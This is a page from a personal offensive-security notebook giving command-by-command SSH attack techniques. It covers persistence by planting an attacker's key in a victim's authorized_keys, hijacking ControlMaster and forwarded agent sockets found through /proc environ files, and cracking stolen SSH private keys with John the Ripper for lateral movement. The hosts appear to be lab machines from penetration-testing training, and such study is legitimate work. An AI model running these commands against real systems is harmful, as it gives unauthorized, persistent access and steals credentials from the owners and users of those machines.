AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page
  • Peristence
  • Create keys on attacker box
  • Copy id_rsa.pub key to victim
  • SSH Agent-Forwarding
  • Enumeration of sockets
  • Look for the last line "SSH_AUTH_SOCK"
  • Cracking SSH Keys
  • Copy SSH key to Kali

Was this helpful?

  1. Offensive Cyberz
  2. Linux

SSH

SSH Persistence and Hijacking

Peristence

if writable on victim

~/.ssh/authorized_keys

Create keys on attacker box

ssh-keygen

Copy id_rsa.pub key to victim

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/kali/.ssh/authorized_keys
ssh-copy-id "user@hostname.example.com -p <port-number>"
cat ~/.ssh/id_rsa.pub | ssh <user>@<hostname> 'cat >> .ssh/authorized_keys

Now you can SSH without a passphrase

ssh kali@linuxvictim

SSH Agent-Forwarding

Looking for socket files

  • Use existing connection to get to another machine

  • modification of ~/.ssh/config

  • any new connections will try to use an existing control socket

  • need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config && mkdir ~/.ssh/controlmaster

  • Create keys

ssh-keygen

  • public keys need to be copied to the other boxes if possible

ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@controller  
ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@linuxvictim

  • Must modify local .ssh/config file to enable forward agent

echo "ForwardAgent yes" >> .ssh/config

  • The intermediate server / controller must have AllowAgentForwarding in sshd config enabled

grep AllowAgentForwarding /etc/ssh/sshd_config

  • must enable the ssh agent on our Kali box

eval 'ssh-agent'

  • now we must add our keys to the ssh agent

ssh-add

  • ssh into the controller as offsec, then ssh into the linuxvictim as offsec and exit the linux victim session

Controlmaster config


Host *  
ControlPath ~/.ssh/controlmaster/%r@%h:%p  
ControlMaster auto  
ControlPersist 10m
ForwardAgent yes

  • need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config  
mkdir ~/.ssh/controlmaster

  • if there happens to be a session it can be seen in the controlmaster folder created


ls -al ~/.ssh/controlmaster/

  • If there is an entry you can ssh to that box by specifying ssh -S

ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim

Enumeration of sockets

  • Looking for the "SSH_AUTH_SOCK entry"

ps -aux | grep ssh

pstree -p offsec | grep ssh\

cat /proc/[pid]/environ

Look for the last line "SSH_AUTH_SOCK"

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380
ssh-add -l
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380
ssh offsec@linuxvictim

Cracking SSH Keys

Copy SSH key to Kali

python /usr/share/john/ssh2john.py svuser.key > svuser.hash

gunzip /usr/share/wordlists/rockyou.gz (if not already done)

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

Use cracked key to laterally move

ssh -i ./svuser.key -o StrictHostKeyChecking=no svuser@controller
PreviousImpacketNextKerberos Cache File

Last updated 3 years ago

Was this helpful?